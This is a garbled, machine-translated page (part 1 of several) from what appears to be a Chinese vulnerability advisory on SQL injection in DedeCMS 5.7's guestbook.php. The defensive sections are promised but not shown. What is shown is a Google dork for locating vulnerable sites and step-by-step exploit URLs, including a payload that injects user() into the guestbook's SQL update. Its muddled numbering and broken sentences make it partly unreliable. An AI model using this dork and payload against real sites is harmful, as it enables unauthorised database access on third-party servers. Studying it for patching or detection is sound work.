dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit. inc. php-vulnerability warning-the black bar safety net

1. Vulnerability description

2. Vulnerability trigger conditions 3. Vulnerability the range of 4. Vulnerability code analysis 5. Defense method 6. Offensive and defensive thinking

! Copy codes

1. Vulnerability description

Injection vulnerability success requires the following conditions

1. php magic_quotes_gpc=off 2. Vulnerability file exists: plus/guestbook.php 3. In the database: dede_guestbook also requires the presence of

Relevant Link:

inurl:/plus/guestbook.php

2. Vulnerability trigger condition

! Copy codes

1. http://localhost/dedecms5.7/plus/guestbook.php
2. [Reply/edit]can see the visitor Message ID. Then write down the ID, for example: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
3. Access: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc’&id=1
4. After the submission, if it is dede5. 7 version, then there will be"successfully changed or replying to a message", then it would prove that the modification is successful a 5. Then return to: http://localhost/dedecms5.7/plus/guestbook.php see the following modification of the message content is changed. errs.cc’ If Yes, then prove that this vulnerability cannot be reused should be for his opening: php magic_quotes_gpc=off
5. If no modification is successful, then the Message ID of the content, or the previous, it would prove a vulnerability can be utilized. 7. Then again visit: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=‘,msg=user(),email=’
6. Then return the Message ID of the contents modified directly into mysql. user().

! Copy codes

[1] [2] [3] next